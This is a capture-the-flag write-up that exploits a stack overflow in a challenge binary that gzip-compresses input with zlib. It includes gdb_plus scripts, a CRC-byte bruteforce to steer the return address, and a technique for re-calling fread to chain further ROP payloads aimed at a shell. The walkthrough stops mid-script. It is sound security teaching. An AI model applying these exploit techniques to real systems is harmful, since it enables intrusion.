Writeup by edoardo3512 for deflation

pwn x86/x64

April 14, 2025

We are given three files: the binary to exploit, the libc running on the server and its loader:

  • deflation
  • libc-2.31.so
  • ld-linux-x86-64.so.2

The binary deflation is a 64-bit, dynamically linked executable that is not stripped, so its symbols are still present.

$ file deflation
deflation: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./libs/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9f9004e64d78412fc211c5122029509ab2be767c, not stripped

$ checksec deflation
[*] '/deflation'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3ff000)
    RUNPATH:    b'./libs'
    Stripped:   No

We can see from checksec that the binary is not PIE and has no canary, so I expect a buffer overflow that lets us overwrite the return address with a ropchain. We are also expected to use the libc, so if there is no second vulnerability to leak data we will probably need two ropchains: one to leak the libc address and one to call system("/bin/sh").

To make sure that the program runs with the correct libraries while we develop our exploit, we renamed the libc to libc.so.6 (don’t be like me, I always forget this step) and used patchelf --set-interpreter ./libs/ld-linux-x86-64.so.2 --set-rpath ./libs deflation to set the loader and the path to the libraries. This is why RUNPATH points to my libs folder. Notice, though, that patchelf added a page at the beginning of the binary (No PIE (0x3ff000) instead of the typical 0x400000). Be careful about this if you compute the addresses of your functions relative to the base of the binary.

Exploration

Code

If we look at the code of the program with Ghidra, it is quite straightforward: a main function and a function that the author already named vuln.

int main(void)

{
  int len;
  char buffer[256];

  len = fread(buffer,1,0x100,stdin);
  vuln(buffer,len);
  return 0;
}

void vuln(char *user_buffer,int len)

{
  char tmp_buffer[264];

  strm._64_4_ = 0;
  strm._68_4_ = 0;
  strm._72_4_ = 0;
  strm._76_4_ = 0;
  strm._80_8_ = 0;
  deflateInit2_(strm,0xffffffff,8,0x1f,8,0,"1.2.11",0x70);
  strm._32_4_ = 0x200;
  strm._0_8_ = user_buffer;
  strm._8_4_ = len;
  strm._24_8_ = tmp_buffer;
  deflate(strm,4);
  memcpy(user_buffer,tmp_buffer,strm._40_8_);
  deflateEnd(strm);
  fwrite(user_buffer,1,strm._40_8_,stdout);
  return;
}

From here we can see that the program reads 256 bytes and then tries to compress them with a function that is probably vulnerable to a buffer overflow, but I don’t see an obvious bug. The stack frame in vuln is even larger than the one in main, so how could our compressed data, which should take less space, overflow it?
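The offsets Ghidra shows on strm line up with the fields of zlib’s z_stream. Below is a sketch of that layout with ctypes, assuming the LP64 layout of 64-bit Linux (field list taken from zlib.h, comments map it to the decompiled writes). Its size should be 0x70, the last argument passed to deflateInit2_. Read the same way, the other arguments are level 0xffffffff = -1 (Z_DEFAULT_COMPRESSION), windowBits 0x1f = 15 + 16 (write a gzip header and trailer), and the 4 passed to deflate is Z_FINISH. It also shows that avail_out is set to 0x200, while tmp_buffer is only 264 bytes according to the decompiler, so deflate is allowed to write past its end.

```python
import ctypes

# Hand-written LP64 (64-bit Linux) layout of zlib's z_stream, following zlib.h.
# Assumption: uInt and int are 4 bytes, uLong and pointers are 8 bytes.
class ZStream(ctypes.Structure):
    _fields_ = [
        ("next_in", ctypes.c_void_p),    # strm._0_8_  = user_buffer
        ("avail_in", ctypes.c_uint32),   # strm._8_4_  = len
        ("total_in", ctypes.c_uint64),
        ("next_out", ctypes.c_void_p),   # strm._24_8_ = tmp_buffer
        ("avail_out", ctypes.c_uint32),  # strm._32_4_ = 0x200
        ("total_out", ctypes.c_uint64),  # strm._40_8_ = size given to memcpy and fwrite
        ("msg", ctypes.c_char_p),
        ("state", ctypes.c_void_p),
        ("zalloc", ctypes.c_void_p),     # strm+64 to strm+88 are zeroed
        ("zfree", ctypes.c_void_p),      # before deflateInit2_ is called
        ("opaque", ctypes.c_void_p),
        ("data_type", ctypes.c_int32),
        ("adler", ctypes.c_uint64),
        ("reserved", ctypes.c_uint64),
    ]

for name, _ in ZStream._fields_:
    print(f"strm+{getattr(ZStream, name).offset:<3} {name}")
print("sizeof(z_stream) =", hex(ctypes.sizeof(ZStream)))
```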

Fuzzing

Let’s fuzz the program a bit to get an idea of how it behaves. In this case I will test:

  • Only As
  • Random data to maximize the entropy
  • A single byte
from gdb_plus import *
from os import urandom as random_bytes

binary_name = "./deflation"
context.binary = binary_name

def check_length(debugger):
  """
  Log how much data we are copying back over the initial buffer
  """
  print(f"Compressed data: {debugger.args[2]}/256 bytes.")
  return False

def test(dbg, input_):
  dbg.b("plt.memcpy", callback=check_length) # Somehow the symbols of the libc give us a different address for memcpy so I put the breakpoint in the plt instead of the libc
  dbg.p.send(input_)
  dbg.c()
  print(f"status: {dbg._stop_reason}") # We expect "NOT RUNNING" if the program exited normally
  data = dbg.p.recvline(timeout=1)[:-1] # Ignore \n
  print(input_, "->", data)

with Debugger(context.binary) as dbg:
  test(dbg, b"A"*256)

with Debugger(context.binary) as dbg:
  test(dbg, random_bytes(256))

with Debugger(context.binary) as dbg:
  dbg.until("fread")
  dbg.args[2] = 1 # Change size read to 1 byte
  test(dbg, b"A")
Compressed data: 24/256 bytes.
status: NOT RUNNING
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' -> b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03st\x1c\xd9\x00\x00\x13[\x97I\x00\x01\x00\x00'

Compressed data: 279/256 bytes.
status: SIGSEGV
b"\x0b%\xd5py\\\xc0\xabl&\xa4\xa9|\x16\x04\x04\x83(h\xe4V\xbc\xe5\xc1\xe29\\\x90\x80\x8b)\t\x19\x0b\x14Q\x86j\xa2\x897\x8f\x15M\xe1\xfb\x8dVv?\x0b\xcf\xf9\x19(\xfc=m\x8a\x9ayb>\x84b\x03\xeeE\x82\xf8K\x9d4P|\xa3\xf3p\x86T\x86\xee\xf1\xd1\xc5\xda\x0f~)\xbb$n\xe1}\x9b6\xf1[\x1a\xfcB-\xf3\x0bF\x0f\xb1\x04\xab\xb1M\xc6_\xe4d\xe0t\x9b\xd9\xbe\xf0\xae\xc0\xa8\x1c\x05\xb7\r5r\xb6\xa0F\xb0z\x84\xf0\xa2I\xfe1\xae\xabL\n\x17\xb9ke\xf9H\r)\x86\xe2Z\xa3\xd92oF\xe0\xa50\xd6,\xb3\xb9\x1arn\\\xbem@\xb8\xbb0\xc2\xf3\xe5\xa6\xbfE\x02%\xc8\x7f\x97\x9f':\x17\\>\xdd\x98))J\xb0\xe6[\xbf\x15\x08\xe2\x89\x9e3\x90\x8f\xfd\xc4Z\x073\xad\x14\xe3\xae'\r5\x03\x9e\x81\xac\x1b\x01[\x1a\xf59\x7fP\xbbJ\xe8\x86\x99\x88O\x8c\xfe.\xd4*5\xb8\xedM\x11m\xf0\xad" -> b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03\x01\x00\x01\xff\xfe\x0b%\xd5py\\\xc0\xabl&\xa4\xa9|\x16\x04\x04\x83(h\xe4V\xbc\xe5\xc1\xe29\\\x90\x80\x8b)\t\x19\x0b\x14Q\x86j\xa2\x897\x8f\x15M\xe1\xfb\x8dVv?\x0b\xcf\xf9\x19(\xfc=m\x8a\x9ayb>\x84b\x03\xeeE\x82\xf8K\x9d4P|\xa3\xf3p\x86T\x86\xee\xf1\xd1\xc5\xda\x0f~)\xbb$n\xe1}\x9b6\xf1[\x1a\xfcB-\xf3\x0bF\x0f\xb1\x04\xab\xb1M\xc6_\xe4d\xe0t\x9b\xd9\xbe\xf0\xae\xc0\xa8\x1c\x05\xb7\r5r\xb6\xa0F\xb0z\x84\xf0\xa2I\xfe1\xae\xabL'

Compressed data: 21/256 bytes.
status: NOT RUNNING
b'A' -> b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03s\x04\x00\x8b\x9e\xd9\xd3\x01\x00\x00\x00'

Indeed, with random (and therefore hardly compressible) data, the compressed output is longer than the input (279 bytes instead of 256) and the program segfaults, which suggests that we are overwriting the return address of a function!

Understanding zlib

Looking more into the documentation of deflate, we find that it works by replacing repeated sequences of bytes with back-references (and then Huffman-coding the result), so a buffer like [i for i in range(256)], where no byte repeats, cannot be compressed. Since it is also much more readable for our analysis, we will use it as our default input.
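We can check this locally, without the binary, using Python’s zlib with the same parameters vuln passes to deflateInit2_. This is a sketch that assumes the system zlib behaves like the 1.2.11 on the server for such small inputs.

```python
import os
import zlib

def deflate_like_vuln(data: bytes) -> bytes:
    # Same parameters as vuln: level -1 (Z_DEFAULT_COMPRESSION), Z_DEFLATED,
    # windowBits 31 (15 + 16: gzip header and trailer), memLevel 8,
    # default strategy, then a single flush with Z_FINISH.
    c = zlib.compressobj(-1, zlib.DEFLATED, 31, 8, zlib.Z_DEFAULT_STRATEGY)
    return c.compress(data) + c.flush(zlib.Z_FINISH)

inputs = {
    "only As": b"A" * 256,
    "range(256)": bytes(range(256)),
    "random": os.urandom(256),
}
for name, data in inputs.items():
    print(f"{name:>10}: 256 -> {len(deflate_like_vuln(data))} bytes")
```

The exact size for the As may differ slightly between zlib versions, but range(256) and random data should both grow past 256 bytes, like in the fuzzing run.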

We can also write a small program to decompress the data we receive. Since the library is standard I could probably have done it in Python with zlib, but by reflex, to keep the behaviour as close as possible to the one in the challenge (truthfully, I just didn’t want to understand the strm structure yet and was being lazy), I had ChatGPT quickly write it in C after reading the vuln function.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <zlib.h>

void decompress(void *compressed_data, int compressed_len) {
    unsigned char output_buffer[1024]; // Adjust size as needed
    z_stream strm;

    // Initialize the decompression stream
    memset(&strm, 0, sizeof(strm));
    strm.avail_in = compressed_len;
    strm.next_in = compressed_data;
    strm.avail_out = sizeof(output_buffer);
    strm.next_out = output_buffer;

    if (inflateInit2(&strm, 31) != Z_OK) {
        fprintf(stderr, "inflateInit2 failed\n");
        return;
    }

    if (inflate(&strm, Z_FINISH) != Z_STREAM_END) {
        fprintf(stderr, "inflate failed\n");
        inflateEnd(&strm);
        return;
    }

    // Print the decompressed output
    fwrite(output_buffer, 1, strm.total_out, stdout);

    inflateEnd(&strm);
}

int main() {
    unsigned char input_buffer[1024];
    int read_size = fread(input_buffer, 1, sizeof(input_buffer), stdin);

    if (read_size <= 0) {
        fprintf(stderr, "Failed to read input\n");
        return 1;
    }

    decompress(input_buffer, read_size);
    return 0;
}

We have to compile it linking against libz (-lz):

gcc inflation.c -o inflation -lz

and then we can make sure it works.

from pwn import *

def unzip(data):
  with context.silent:
      p = process("./inflation")
      p.send(data)
      p.stdin.close()
      data = p.recvall()  # Read until the process exits, recv() may return only part of the output
      p.close()
  return data

def zip(data):
  with context.silent:
      p = process("./deflation")
      p.send(data)
      p.stdin.close()
      data = p.recvall()
      p.close()
  return data

data = b"ABCD" * 0x40
if data == unzip(zip(data)):
  log.success("unzip works as expected!")
else:
  log.failure("unzip doesn't work!")
unzip works as expected!
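For reference, a Python version of inflation should only take a couple of lines: zlib.decompress with wbits=31 expects the same gzip wrapper as inflateInit2(&strm, 31). In this sketch the compressing side is a local stand-in (zip_ is a hypothetical name) so the round trip can run without the challenge binary, and the last check decompresses the 21 bytes the binary returned for a single A while fuzzing.

```python
import zlib

def unzip(data: bytes) -> bytes:
    # wbits=31 (15 + 16) expects a gzip header and trailer,
    # like inflateInit2(&strm, 31) in inflation.c.
    return zlib.decompress(data, wbits=31)

def zip_(data: bytes) -> bytes:
    # Hypothetical local stand-in for ./deflation, using vuln's deflateInit2_ parameters.
    c = zlib.compressobj(-1, zlib.DEFLATED, 31, 8, zlib.Z_DEFAULT_STRATEGY)
    return c.compress(data) + c.flush(zlib.Z_FINISH)

data = b"ABCD" * 0x40
print("unzip works as expected!" if unzip(zip_(data)) == data else "unzip doesn't work!")

# Output the challenge binary produced for a single "A" while fuzzing.
from_binary = b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03s\x04\x00\x8b\x9e\xd9\xd3\x01\x00\x00\x00"
print(unzip(from_binary))
```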

Exploitation

Buffer overflow

Let’s look at what data exactly is being overwritten when we overflow the buffer. I will print the stack before and after calling vuln, before and after calling deflate, and right before returning from main to see what overwrote the return address.

from gdb_plus import *

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
input_ = bytes([i for i in range(256)])
dbg.p.send(input_)
dbg.until("main+42")
print("stack main before call vuln:")
dbg.telescope(length=37)
#print(f"base pointer main: {hex(dbg.rbp)}") # There is no leave so it doesn't matter
dbg.until("vuln+64") # Setup stack
print("stack vuln before call deflate:")
dbg.telescope(length=38)
dbg.until("vuln+138") # Call deflate
print("stack vuln after call deflate:")
dbg.telescope(dbg.rsp+0x10, length=38) # +0x10 to ignore the 2 arguments pushed on stack to call deflateInit2_
dbg.until("vuln+203") # popped rbp
#print(f"new base pointer main: {hex(dbg.rbp)}")
dbg.finish()
print("stack main after call vuln:")
dbg.telescope(length=37)
dbg.until("main+57") # Return instruction
print("stack before return")
dbg.telescope(length=4)

To make it more readable, I shortened all the buffers here.

stack main before call vuln:
0x00007fff7ee53830│+0x0000: 0x0706050403020100	 ← $rbp, $rdi
0x00007fff7ee53838│+0x0008: 0x0f0e0d0c0b0a0908
... user input ...
0x00007fff7ee53920│+0x00f0: 0xf7f6f5f4f3f2f1f0
0x00007fff7ee53928│+0x00f8: 0xfffefdfcfbfaf9f8

0x00007fff7ee53930│+0x0100: 0x0000000000401290  →  <__libc_csu_init+0000> push r15
0x00007fff7ee53938│+0x0108: 0x00007b0c3d97ed0a  →  <__libc_start_main+00ea> mov edi, eax
0x00007fff7ee53940│+0x0110: 0x00007fff7ee53a28  →  0x00007fff7ee55331  →  "/deflat[...]"
0x00007fff7ee53948│+0x0118: 0x000000017ee53d59
0x00007fff7ee53950│+0x0120: 0x0000000000401090  →  <main+0000> push rbp

stack vuln before call deflate:
0x00007fff7ee53700│+0x0000: 0x0000000000000000	 ← $rsp
0x00007fff7ee53708│+0x0008: 0x0000000067a5f69e
0x00007fff7ee53710│+0x0010: 0x0000000015559c39
0x00007fff7ee53718│+0x0018: 0x0000000067a5f69f
... random junk ...
0x00007fff7ee537f8│+0x00f8: 0x0000000000000000
0x00007fff7ee53800│+0x0100: 0x00007fff7ee53830  →  0x0706050403020100
0x00007fff7ee53808│+0x0108: 0x0000000000000000
0x00007fff7ee53810│+0x0110: 0x00007fff7ee53830  →  0x0706050403020100
0x00007fff7ee53818│+0x0118: 0x00000000004010d0  →  <_start+0000> xor ebp, ebp
0x00007fff7ee53820│+0x0120: 0x0000000000000000
0x00007fff7ee53828│+0x0128: 0x00000000004010bf  →  <main+002f> add rsp, 0x100

stack vuln after call deflate:
0x00007fff7ee53700│+0x0000: 0x0000000000088b1f	 ← $r13
0x00007fff7ee53708│+0x0008: 0x00feff0100010300
0x00007fff7ee53710│+0x0010: 0x0807060504030201
0x00007fff7ee53718│+0x0018: 0x100f0e0d0c0b0a09
... User input shifted right by 1 byte ...
0x00007fff7ee537f8│+0x00f8: 0xf0efeeedecebeae9
0x00007fff7ee53800│+0x0100: 0xf8f7f6f5f4f3f2f1
0x00007fff7ee53808│+0x0108: 0x73fffefdfcfbfaf9
0x00007fff7ee53810│+0x0110: 0x000000010029058c

0x00007fff7ee53818│+0x0118: 0x00000000004010d0  →  <_start+0000> xor ebp, ebp
0x00007fff7ee53820│+0x0120: 0x0000000000000000
0x00007fff7ee53828│+0x0128: 0x00000000004010bf  →  <main+002f> add rsp, 0x100

stack main after call vuln:
0x00007fff7ee53830│+0x0000: 0x0000000000088b1f	 ← $rsp
0x00007fff7ee53838│+0x0008: 0x00feff0100010300
0x00007fff7ee53840│+0x0010: 0x0807060504030201
0x00007fff7ee53848│+0x0018: 0x100f0e0d0c0b0a09
... User input shifted right by 1 byte ...
0x00007fff7ee53928│+0x00f8: 0xf0efeeedecebeae9
0x00007fff7ee53930│+0x0100: 0xf8f7f6f5f4f3f2f1
0x00007fff7ee53938│+0x0108: 0x73fffefdfcfbfaf9
0x00007fff7ee53940│+0x0110: 0x000000010029058c
0x00007fff7ee53948│+0x0118: 0x000000017ee53d59
0x00007fff7ee53950│+0x0120: 0x0000000000401090  →  <main+0000> push rbp

stack before return
0x00007fff7ee53938│+0x0000: 0x73fffefdfcfbfaf9	 ← $rsp
0x00007fff7ee53940│+0x0008: 0x000000010029058c
0x00007fff7ee53948│+0x0010: 0x000000017ee53d59
0x00007fff7ee53950│+0x0018: 0x0000000000401090  →  <main+0000> push rbp

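From this we can see that the 279 bytes coming out of deflate are our 256 bytes of raw input, unchanged, wrapped in 23 bytes of metadata. Looking at our buffer starting at 0x00007fff7ee53830, 15 of those bytes come before our data: the 10-byte gzip header (1f 8b 08 00 00 00 00 00 00 03) and the 5-byte header of a stored, i.e. uncompressed, deflate block (01 00 01 ff fe: final block, LEN 0x100 and its complement NLEN). The other 8 come after it: the CRC32 of our input (0x29058c73) and its length (0x100), both little endian. With this we do end up overwriting the return address of main, but since our data is shifted by those 15 bytes we only have direct control over its 7 lowest bytes.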
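The layout matches a gzip member (RFC 1952) containing a single stored deflate block (RFC 1951). As a sketch, assuming deflate always picks a stored block for our incompressible input, we can rebuild vuln’s output by hand and read the qword that lands on main’s return address, 0x108 bytes into the buffer according to the "stack before return" dump.

```python
import struct
import zlib

# Magic, CM=8 (deflate), no flags, mtime 0, XFL 0, OS 3 (Unix), as in the dump.
GZIP_HEADER = bytes.fromhex("1f8b0800000000000003")

def stored_gzip(data: bytes) -> bytes:
    # Assumption: a single final stored block (header byte 0x01, LEN, NLEN).
    block = b"\x01" + struct.pack("<HH", len(data), len(data) ^ 0xFFFF)
    trailer = struct.pack("<II", zlib.crc32(data), len(data))  # CRC32, ISIZE
    return GZIP_HEADER + block + data + trailer

def main_return_address(data: bytes) -> int:
    # main's return address sits 0x108 bytes into the buffer vuln copies back into.
    return struct.unpack_from("<Q", stored_gzip(data), 0x108)[0]

payload = bytes(range(256))
print(len(stored_gzip(payload)), hex(main_return_address(payload)))
```

With bytes(range(256)) this should reproduce the 0x73fffefdfcfbfaf9 from the dump: data bytes 249 to 255 fill the 7 low bytes, and the top byte is the lowest byte of zlib.crc32 of the whole input.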

The most significant byte of the return address is set by our metadata, but the metadata depend on our payload, so can we, in theory, find a payload that generates metadata with the byte we want? It doesn’t seem that far-fetched, since there are many more possible permutations of our input than possible byte values. Maybe we could even control it to the point that the rest is also a valid address, letting us call two gadgets instead of one, but that feels much more unlikely. We will first focus on using a single gadget while keeping the other option in the back of our mind in case we really need it (spoiler: we won’t).
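To put a rough number on "not that far-fetched": if we treat the metadata byte as a uniformly random byte for each different payload (a heuristic assumption, not something zlib guarantees), the chance that at least one of n payloads gives the byte we want is 1 - (255/256)^n.

```python
def hit_probability(tries: int) -> float:
    # Chance that at least one of `tries` payloads yields the wanted byte,
    # assuming each payload gives an independent, uniformly random byte.
    return 1 - (255 / 256) ** tries

for tries in (1, 64, 256, 1024):
    print(f"{tries:5d} tries -> {hit_probability(tries):.1%}")
```

Under this assumption, trying the 256 rotations of a single input should succeed roughly 63% of the time, so a simple bruteforce is worth a shot.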

First payload: setup future attack

With only one gadget, what are our options?

The first thing to look for is certainly a way to write more data on the stack, so that we can send a longer ropchain to execute next, for example by calling fread, which the program already uses.

Let’s check the state of our registers when we reach the ret instruction in main.

...
print(dbg.execute("context regs"))
───────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0
$rbx   : 0x73fffefdfcfbfaf9
$rcx   : 0x0000773478feef33  →  0x5577fffff0003d48 ("H="?)
$rdx   : 0x000000001b8f13ac  →  0x0008000000080000
$rsp   : 0x00007ffe7b136f28  →  0x73fffefdfcfbfaf9
$rbp   : 0xf8f7f6f5f4f3f2f1
$rsi   : 0x0
$rdi   : 0x00007734790c1670  →  0x0000000000000000
$rip   : 0x00000000004010c9  →  <main+0039> ret
$r8    : 0x117
$r9    : 0x00007734790beb00  →  0x0000000000000000
$r10   : 0x6e
$r11   : 0x246
$r12   : 0x00000000004010d0  →  <_start+0000> xor ebp, ebp
$r13   : 0x0
$r14   : 0x0
$r15   : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
────────────────────────────────────────────────────────────────────────────────

We could try to call fread through the plt. The arguments fread needs are rdi -> stack buffer, rsi -> size, rdx -> count, rcx -> stdin, but we can immediately see that rcx no longer points to stdin, so without other gadgets to set it first there is no way to call fread directly.

The other option, then, is to jump back into main, where the program itself calls fread. If we skip the instruction that sets the count argument, fread will instead use the value left in rdx, which is much bigger now. This is a valid option because main does not use a leave instruction, so we don’t have to worry about the corrupted base pointer when we don’t enter the function from the beginning.

If we look at how fread is called, we see how lucky we are: the arguments are set in the order count, size, stream and then ptr, so if we jump to 0x0401096 all the arguments are set correctly to call fread, except count, which keeps the value already stored in rdx.

        00401091 ba 00 01        MOV        EDX,0x100
                 00 00
        00401096 be 01 00        MOV        ESI,0x1
                 00 00
        0040109b 48 81 ec        SUB        RSP,0x100
                 00 01 00 00
        004010a2 48 8b 0d        MOV        RCX,qword ptr [stdin]
                 87 2f 00 00
        004010a9 48 89 e5        MOV        RBP,RSP
        004010ac 48 89 ef        MOV        RDI,RBP
        004010af e8 7c ff        CALL       <EXTERNAL>::fread
                 ff ff

When we reach the ret instruction of main, rdx contains 0x1b8f13ac, which would be a valid number of bytes to read. The only problem is that this is roughly 460MB of data, so we will probably not be able to send that much and will be forced to send an EOF at some point, killing stdin (spoiler: we won’t). If that happens, then instead of system("/bin/sh"), which would require further interaction with the process, we will probably need to open, read and write the flag file so that we can extract it directly. Unfortunately this also means that we would not be able to send another ropchain after leaking the libc. This may be bothersome, but let’s think about it later.

Controlling the return address

Let’s start by finding what input can make us jump to 0x0401096 in the first place. I will use gdb_plus to debug the binary and detect when the return address is correctly overwritten.

from gdb_plus import *

target_address = 0x0401096
target = p64(target_address)[:-1] # Remove the most significant byte, which we don't control
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]

binary_name = "./deflation"
context.binary = binary_name

p = log.progress('Bruteforce padding')
for i in range(256):
    p.status(f"{i+1}/256")
    with Debugger(context.binary) as dbg:
      payload = shift(data, i) + target # Will be longer than 256 since the null bytes in the address do repeat
      dbg.p.send(payload[-256:])
      dbg.until("main+57")
      if dbg.read_pointer(dbg.rsp) == target_address:
        p.success(f"found {i=}")
        break

else:
  p.failure("Couldn't find offset")

We do get a valid payload!

[+] Bruteforce padding: found i=94
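With the layout of the stored block in mind, the same bruteforce can be sketched offline, without gdb. The model is an assumption (vuln emits a stored block): the last 7 bytes of the payload become the low 7 bytes of the return address, and its top byte is the lowest byte of the CRC32 of the whole payload. If the model is right, the i=94 found above should be among the shifts it predicts.

```python
import struct
import zlib

TARGET = 0x401096
target = struct.pack("<Q", TARGET)[:-1]  # the 7 low bytes we control directly
data = bytes(i for i in range(256) if i not in target)

def shift(array: bytes, n: int) -> bytes:
    return array[n:] + array[:n]

def candidate(i: int) -> bytes:
    # Same construction as the gdb_plus script: rotate, append the address, keep 256 bytes.
    return (shift(data, i) + target)[-256:]

def predicted_return_address(payload: bytes) -> int:
    # Model (assumes a stored block): payload[249:256] lands in the low 7 bytes of
    # main's return address, the lowest byte of the CRC32 becomes the top byte.
    low = int.from_bytes(payload[249:256], "little")
    return low | ((zlib.crc32(payload) & 0xFF) << 56)

hits = [i for i in range(256) if predicted_return_address(candidate(i)) == TARGET]
print("shifts predicted to work:", hits)
```

Since only the CRC byte has to be 0x00, the whole search is 256 calls to zlib.crc32 instead of 256 debugger sessions.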

Limitations of calling fread(buffer, 1, …, stdin)

We found a valid payload, but how much data is it going to read exactly?

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57") # Finish the first execution
dbg.until("fread") # Reach corrupted fread
print(f"calling fread({hex(dbg.args[0])}, 1, {hex(dbg.args[2])}, stdin)")

If we run it multiple times we get a different size every time, ranging from about 15MB to almost 1GB of data…

calling fread(0x7ffd038ea270, 1, 0x3b481312, stdin)

calling fread(0x7ffdb37d3d00, 1, 0xdff312, stdin)

calling fread(0x7ffe7200b060, 1, 0xa404312, stdin)

As discussed above, sending that much data doesn’t seem to be an option, not just because of the connection, but also because it will probably not fit on the stack, and trying to write past its end may cause a segfault (spoiler: it doesn’t). I really don’t want to close the stream, though, so I first tried to see what would happen if we did send an absurd amount of data to the process anyway.

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57")
dbg.until("fread")
data = b"A" * dbg.args[2] # Send as much data as fread is expecting
dbg.finish(wait=False)
dbg.p.send(data)

Running this script, we notice that although p.send never seems to return, fread does return immediately! If we then check rax, we see that it only read 0x1000 bytes before stopping!

At the same time, if we check the stack we see more than 4096 As written: the stack is completely filled up to the end of its mapping.

(remote) gef➤  x/s 0x00007ffc2ac6edb0
0x7ffc2ac6edb0:	'A' <repeats 4688 times><error: Cannot access memory at address 0x7ffc2ac70000>

We can try to control how much data we send by adding a chunk at a time until the function returns.

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57")
dbg.until("fread")
buffer_address = dbg.args[0]
done = dbg.finish(wait=False)
dbg.p.send(b"A" * 0x1000)
counter = 0
chunk_size = 0x100
while not done.wait(timeout=0.5): # Same results with timeout=5 and chunks of 0x10, 0x500 or 0x1000 bytes. 0.1s though may be too short
    counter += 1
    dbg.p.send(b"B" * chunk_size)
print(f"sent {hex(0x1000 + counter * chunk_size)} bytes")
print("fread ->", hex(dbg.return_value))
print(dbg.execute(f"x/s {hex(buffer_address)}"))

The rule seems to be that the program reads data one chunk at a time, with chunks of up to 0x1000 bytes, for as long as they fit on the stack. Once a chunk doesn’t fit completely, fread returns: the part of that chunk that fits is still written on the stack, but the return value only counts the chunks that were read completely (in the first run below, 0x1300 is returned while 0x1330 bytes were written). To make fread return, though, we have to send one more chunk than what will be read, and that chunk will probably stay in the stream buffer.

sent 0x1400 bytes
fread() -> 0x1300
0x7ffc1bc2fcd0:	'A' <repeats 4096 times>, 'B' <repeats 816 times><error: Cannot access memory at address 0x7ffc1bc31000>

sent 0x2a00 bytes
fread() -> 0x2900
0x7ffdeee54690:	'A' <repeats 4096 times>, 'B' <repeats 6512 times><error: Cannot access memory at address 0x7ffdeee57000>
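The rule can be written as a tiny model and checked against the two runs above. This is a hypothetical model of what we observed (model_fread is an illustrative name), not of how glibc or the kernel actually implement it. The available space is the distance between the fread buffer and the unmapped address in the error message.

```python
def model_fread(space: int, chunks: list) -> tuple:
    """Hypothetical model of the observed behaviour.

    `space` is the number of bytes between the fread buffer and the end of the
    stack mapping, `chunks` are the sizes of the successive sends. Chunks are
    copied in order; the first one that does not fit is only partially written,
    is not counted in the return value and stays in the stream.
    Returns (fread return value, bytes written on the stack).
    """
    returned = written = 0
    for size in chunks:
        if written + size > space:
            return returned, space  # partial copy up to the unmapped page
        returned += size
        written += size
    return returned, written  # every chunk fit: the real fread would keep waiting

# The two runs above: buffer address, first unmapped address, bytes sent.
runs = [(0x7ffc1bc2fcd0, 0x7ffc1bc31000, 0x1400),
        (0x7ffdeee54690, 0x7ffdeee57000, 0x2a00)]
for start, end, sent in runs:
    chunks = [0x1000] + [0x100] * ((sent - 0x1000) // 0x100)
    ret, written = model_fread(end - start, chunks)
    print(f"sent {hex(sent)}: fread -> {hex(ret)}, {written - 0x1000} Bs on the stack")
```

Both runs match the output above (0x1300 with 816 Bs, 0x2900 with 6512 Bs), and the leftover chunk is exactly what a later call to fread has to consume.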

Execute multiple ropchains

If we can now send our second payload without having to kill stdin, we will probably also be able to send the third one as intended. We just have to keep the stream buffer clean between attacks: if the last chunk of data needed to make fread return really stays in the stream buffer, we have to let the program run a bit more until it is consumed. If we send chunks of 0x100 bytes, a single extra call to main should be enough, since this is how much the program normally reads in one execution.

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57")
dbg.until("fread")
done = dbg.finish(wait=False)
dbg.p.send(p64(dbg.elf.symbols["main"]) * (0x1000 // 8)) # Make a ropchain that constantly returns to the beginning of the program
counter = 0
while not done.wait(timeout=0.5):
    counter += 1
    dbg.p.send(b"B" * 0x100)
print(f"sent {hex(0x1000 + counter * 0x100)} bytes")
print(f"fread -> {hex(dbg.return_value)}")

# This call to fread should consume the last chunk of Bs we sent before
dbg.until("fread")
buffer_address = dbg.args[0]
dbg.finish()
print(dbg.read(buffer_address, 0x100))

# This call to fread should use the new data we send now
dbg.until("fread")
buffer_address = dbg.args[0]
